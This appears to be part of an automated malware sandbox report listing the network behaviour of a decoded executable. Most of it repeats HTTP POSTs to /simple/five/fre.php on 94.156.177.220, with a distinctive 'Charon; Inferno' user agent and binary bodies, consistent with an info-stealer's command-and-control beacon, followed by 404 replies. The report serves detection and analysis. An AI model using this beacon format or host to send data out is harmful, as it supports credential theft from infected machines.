                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: 0_2_00404ED4 recv,0_2_00404ED4
                      Source: unknownHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
